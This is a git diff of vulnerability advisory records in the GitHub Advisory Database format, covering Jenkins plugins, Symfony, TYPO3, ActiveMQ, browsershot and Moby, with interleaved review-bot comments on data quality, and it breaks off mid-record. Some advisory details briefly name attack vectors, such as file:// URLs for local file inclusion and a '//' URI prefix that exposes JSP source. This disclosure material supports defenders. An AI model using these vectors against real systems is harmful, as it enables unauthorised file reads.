 "type": "WEB",
 "url": "https://commonmark.thephpleague.com/changelog/"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/league/commonmark/CVE-2018-20583.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/thephpleague/commonmark"
diff --git a/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json b/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json
index 40c769625d4d0..3e1f1a92569af 100644
--- a/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json
+++ b/advisories/github-reviewed/2022/05/GHSA-r2rq-3h56-fqm4/GHSA-r2rq-3h56-fqm4.json
@@ -109,6 +109,101 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-foundation"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.7.0"
+ },
+ {
+ "fixed": "2.7.48"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-foundation"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.8.0"
+ },
+ {
+ "fixed": "2.8.41"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-foundation"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.3.0"
+ },
+ {
+ "fixed": "3.3.17"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-foundation"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.4.0"
+ },
+ {
+ "fixed": "3.4.11"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-foundation"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "4.0.0"
+ },
+ {
+ "fixed": "4.0.11"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -116,6 +211,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11386"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2018-11386.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11386.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/symfony/symfony"
@@ -136,6 +239,10 @@
 "type": "WEB",
 "url": "https://symfony.com/blog/cve-2018-11386-denial-of-service-when-using-pdosessionhandler"
 },
+ {
+ "type": "WEB",
+ "url": "https://symfony.com/cve-2018-11386"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2018/dsa-4262"
diff --git a/advisories/github-reviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json b/advisories/github-reviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json
new file mode 100644
index 0000000000000..1329c7c34fcc5
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-r5c7-qcc9-5v7m/GHSA-r5c7-qcc9-5v7m.json
@@ -0,0 +1,51 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r5c7-qcc9-5v7m",
+ "modified": "2024-01-30T22:33:30Z",
+ "published": "2022-05-13T01:36:51Z",
+ "aliases": [
+ "CVE-2017-2650"
+ ],
+ "summary": "Jenkins Pipeline Classpath Step plugin allowed Script Security sandbox bypass",
+ "details": "It was found that the use of Pipeline: Classpath Step Jenkins plugin enables a bypass of the Script Security sandbox for users with SCM commit access, as well as users with e.g. Job/Configure permission in Jenkins.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "cprice404:pipeline-classpath"
+ },
+ "versions": [
+ "0.1.0"
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2650"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2017-03-20/"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/96981"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:33:30Z",
+ "nvd_published_at": "2018-07-27T20:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json b/advisories/github-reviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json
new file mode 100644
index 0000000000000..d56c035b59615
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-r5jr-82x4-r6j7/GHSA-r5jr-82x4-r6j7.json
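Review bot: The Maven coordinate `"name": "cprice404:pipeline-classpath"` uses a personal-looking groupId where every other Jenkins plugin in this commit uses `org.jenkins-ci.plugins` (or, for `crowd`, `com.ds.tools.hudson`); a groupId that does not match the plugin's published POM makes the record unmatchable, so confirm it against the artifact actually served by the Jenkins update centre before merging. `"versions": ["0.1.0"]` pins a single release; if the plugin was withdrawn rather than fixed that is accurate, but a `ranges` entry with `last_affected` would also cover any later build, and the linked 2017-03-20 Jenkins advisory is the place to check which case applies. `"cwe_ids": [ ]` is empty although the details describe a sandbox bypass; GHSA-qg7x-4h4q-3m49 in this commit has the same gap, and both are worth filling if the advisory source names a weakness class.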
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r5jr-82x4-r6j7", + "modified": "2024-01-30T21:53:09Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003097" + ], + "summary": "Jenkins Crowd Integration Plugin stores credentials in plain text", + "details": "Jenkins Crowd Integration Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.ds.tools.hudson:crowd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003097" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/crowd-plugin" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1069" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:53:09Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json b/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json index eff060e3141fd..ace82a7bf4593 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json +++ b/advisories/github-reviewed/2022/05/GHSA-r68f-45jg-64m6/GHSA-r68f-45jg-64m6.json 
@@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7927" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7927.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json b/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json index b068f65e8862d..6e0cc9664a11d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json +++ b/advisories/github-reviewed/2022/05/GHSA-r6fv-56gp-j3r4/GHSA-r6fv-56gp-j3r4.json @@ -25,17 +25,14 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "8.3.0" + "introduced": "8.0.0" }, { "fixed": "8.7.27" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 8.7.26" - } + ] }, { "package": { @@ -54,10 +51,45 @@ } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 9.5.7" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.7.27" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] } ], "references": [ 
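Review bot: In the `@@ -25,17 +25,14 @@` hunk of GHSA-r6fv-56gp-j3r4 the `introduced` bound for `typo3/cms-core` moves from `"8.3.0"` to `"8.0.0"`, which newly marks 8.0–8.2 as vulnerable, and nothing in the hunk corroborates that widening. The new `typo3/cms` ranges in the following hunk use the same `"8.0.0"` bound, so if the original 8.3.0 was right both entries are wrong together; the vendor advisory referenced later in this file is the place to confirm. Dropping `last_known_affected_version_range` is consistent with the `fixed` events visible in the hunks (`"8.7.27"`, `"9.5.8"`), which already bound the ranges.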
@@ -65,6 +97,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12748" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2019-12748.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2019-12748.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/TYPO3-CMS/core" @@ -73,6 +113,10 @@ "type": "WEB", "url": "https://typo3.org/cms/release-news/typo3-8-release-notes/" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-015" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-015/" diff --git a/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json b/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json index 993fce3845fe0..bddb618b53d92 100644 --- a/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json +++ b/advisories/github-reviewed/2022/05/GHSA-r7p7-qr7p-2rrf/GHSA-r7p7-qr7p-2rrf.json 
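Review bot: The `@@ -73,6 +113,10 @@` hunk adds `https://typo3.org/security/advisory/typo3-core-sa-2019-015`, which differs from the existing reference on the next line only by its trailing slash, so the advisory now lists the same page twice. Keep one form rather than adding a near-duplicate, or replace the old entry if the new canonical form is preferred. The same near-duplicate pattern appears later in this diff in GHSA-rfvw-5848-gxc5 (`.../CVE-2019-12205` versus `.../cve-2019-12205/`) and GHSA-vccp-5v5h-p8m6 (`http://` versus `https://` for the same bulletin), where the https form should replace rather than sit beside the http one.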
@@ -90,6 +90,158 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.2.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.38" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.8.0" + }, + { + "fixed": "2.8.31" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.2.0" + }, + { + "fixed": "3.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.3.0" + }, + { + "fixed": "3.3.13" + } + ] + } + ] } ], "references": [ 
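Review bot: The eight new ranges cover the 2.7, 2.8, 3.2 and 3.3 branches of `symfony/security-http` and `symfony/security`, but no range covers 3.0.x or 3.1.x, so a scanner will report those versions as unaffected. If those branches were end-of-life and never received the fix they remain vulnerable, and the OSV way to say so is an `introduced` event with no `fixed` (or a `last_affected`) for each of them; if they are genuinely unaffected, a short note in `database_specific` would spare the next curator the same question. The enclosing `affected` array starts before this hunk, so the existing entries it presumably holds for `symfony/symfony` should be checked for the same gap.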
@@ -97,6 +249,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16652" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2017-16652.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2017-16652.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2017-16652.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -108,6 +272,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2017-16652-open-redirect-vulnerability-on-security-handlers" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2017-16652" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json b/advisories/github-reviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json new file mode 100644 index 0000000000000..0fe089c312245 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-rcrv-6r7r-rr7m/GHSA-rcrv-6r7r-rr7m.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcrv-6r7r-rr7m", + "modified": "2024-01-30T21:43:50Z", + "published": "2022-05-13T01:17:45Z", + "aliases": [ + "CVE-2019-1003059" + ], + "summary": "Missing permission check in Jenkins FTP publisher Plugin", + "details": "A missing permission check in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:ftppublisher" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003059" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:43:50Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json b/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json index ed88d54369ffd..cb90b6ab23db7 100644 --- a/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json +++ b/advisories/github-reviewed/2022/05/GHSA-rfvw-5848-gxc5/GHSA-rfvw-5848-gxc5.json 
@@ -82,9 +82,25 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-admin/commit/6e6fa5c618b9dbf4cc0a56704834bfa1d5b0d18e" }, + { + "type": "WEB", + "url": "https://forum.silverstripe.org/c/releases" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-12205.yaml" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2019-12205" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-12205/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json b/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json index c19e6d845f715..d090110897978 100644 --- a/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json +++ b/advisories/github-reviewed/2022/05/GHSA-rqph-vqwm-22vc/GHSA-rqph-vqwm-22vc.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-messaging" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-messaging" }, "ranges": [ { @@ -62,6 +62,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22971" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-framework/commit/dc2947c52df18d5e99cad03383f7d6ba13d031fd" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220616-0003/" diff --git a/advisories/github-reviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json b/advisories/github-reviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json new file mode 100644 index 0000000000000..0dc1a7e2a7527 --- /dev/null 
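Review bot: Two of the references added to GHSA-rfvw-5848-gxc5, `https://forum.silverstripe.org/c/releases` and `https://www.silverstripe.org/download/security-releases/`, are generic landing pages rather than pages about CVE-2019-12205, and generic URLs rot and add noise for consumers that mirror reference lists. Keep the CVE-specific entries and drop the two landing pages unless the curation rule is to import every URL from the FriendsOfPHP record, which the hunk also references, verbatim.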
+++ b/advisories/github-reviewed/2022/05/GHSA-rv74-mh27-4jpv/GHSA-rv74-mh27-4jpv.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv74-mh27-4jpv", + "modified": "2024-02-01T21:49:45Z", + "published": "2022-05-24T17:36:09Z", + "aliases": [ + "CVE-2020-7790" + ], + "summary": "browsershot local file inclusion vulnerability", + "details": "This affects the package spatie/browsershot from 0.0.0. By specifying a URL in the file:// protocol an attacker is able to include arbitrary files in the resultant PDF.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "spatie/browsershot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.40.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7790" + }, + { + "type": "WEB", + "url": "https://github.com/spatie/browsershot/issues/441%23issue-735049731" + }, + { + "type": "WEB", + "url": "https://github.com/spatie/browsershot/pull/440" + }, + { + "type": "WEB", + "url": "https://github.com/spatie/browsershot/commit/8d4bcfb1ff609921007f3fc11d80fcdad35598ac" + }, + { + "type": "WEB", + "url": "https://snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-1037064" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:49:45Z", + "nvd_published_at": "2020-12-11T11:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json b/advisories/github-reviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json new file mode 100644 index 0000000000000..64d1d64e80d8f --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-rxph-cq38-gm3g/GHSA-rxph-cq38-gm3g.json 
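Review bot: The reference `https://github.com/spatie/browsershot/issues/441%23issue-735049731` percent-encodes the fragment separator, so `%23issue-…` is sent to the server as part of the path instead of being treated as a client-side anchor; the intended link is `https://github.com/spatie/browsershot/issues/441#issue-735049731`. Either use the literal `#` or trim the fragment entirely, since `issues/441` alone identifies the report.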
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxph-cq38-gm3g", + "modified": "2024-01-30T21:13:03Z", + "published": "2022-05-24T17:03:48Z", + "aliases": [ + "CVE-2019-16568" + ], + "summary": "Jenkins SCTMExecutor Plugin stores credentials in plain text ", + "details": "Jenkins SCTMExecutor Plugin 2.2 and earlier transmits previously configured service credentials in plain text as part of the global configuration, as well as individual jobs' configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins.sctmexecutor:SCTMExecutor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16568" + }, + { + "type": "WEB", + "url": "https://github.com/jenkins-infra/update-center2/pull/324" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1521" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:13:03Z", + "nvd_published_at": "2019-12-17T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json b/advisories/github-reviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json new file mode 100644 index 0000000000000..3fc3831ae234c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-v2c9-9m8v-8jjm/GHSA-v2c9-9m8v-8jjm.json 
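Review bot: The `summary` value `"Jenkins SCTMExecutor Plugin stores credentials in plain text "` ends with a trailing space, and it says the plugin stores credentials while the `details` text and the assigned `CWE-319` describe transmitting previously configured credentials in plain text. Suggested value: `"summary": "Jenkins SCTMExecutor Plugin transmits credentials in plain text"`. Titles are shown verbatim in consumers, so the trailing whitespace should be stripped regardless of the wording chosen.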
@@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2c9-9m8v-8jjm", + "modified": "2024-02-07T23:08:48Z", + "published": "2022-05-14T02:45:01Z", + "aliases": [ + "CVE-2010-1587" + ], + "summary": "Apache ActiveMQ Sensitive Information Disclosure via the Jetty ResourceHandler", + "details": "The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.activemq:activemq-web-console" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.3.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1587" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/activemq" + }, + { + "type": "WEB", + "url": "https://github.com/apache/activemq/tree/main/activemq-web-console/src/main/webapp" + }, + { + "type": "WEB", + "url": "https://issues.apache.org/activemq/browse/AMQ-2700" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100426064914/http://www.vupen.com/english/advisories/2010/0979" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20100702082040/http://secunia.com/advisories/39567" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150314050810/http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0278.html" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200228044456/http://www.securityfocus.com/bid/39636" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20201208002259/http://www.securityfocus.com/archive/1/510896/100/0/threaded" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-07T23:08:47Z", + "nvd_published_at": "2010-04-28T22:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json b/advisories/github-reviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json new file mode 100644 index 0000000000000..bafbf0fbd39aa --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-v2cv-wwxq-qq97/GHSA-v2cv-wwxq-qq97.json 
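Review bot: `severity` is an empty array in this new file while `database_specific.severity` is `"MODERATE"`, so consumers that derive severity from the CVSS vector get nothing and those that read the label get a rating with no stated basis; every other advisory created in this diff carries a `CVSS_V3` entry. If the curators rate this MODERATE, record the vector they rated it from, as this same diff does for GHSA-v7mh-3jgf-r26c where an empty `severity` array is replaced by a vector.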
@@ -0,0 +1,90 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2cv-wwxq-qq97", + "modified": "2024-02-01T21:22:37Z", + "published": "2022-05-24T16:51:39Z", + "aliases": [ + "CVE-2019-14271" + ], + "summary": "Moby Docker cp broken with debian containers", + "details": "In Docker 19.03.x before 19.03.1 linked against the GNU C Library (aka glibc), code injection can occur when the nsswitch facility dynamically loads a library inside a chroot that contains the contents of the container.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "19.03.0" + }, + { + "fixed": "19.03.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14271" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/issues/39449" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/pull/39612" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/11e48badcb67554b3d795241855028f28d244545" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/fa8dd90ceb7bcb9d554d27e0b9087ab83e54bd2b" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/engine/release-notes/" + }, + { + "type": "WEB", + "url": "https://seclists.org/bugtraq/2019/Sep/21" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20190828-0003/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2019/dsa-4521" + }, + { + "type": "WEB", + "url": 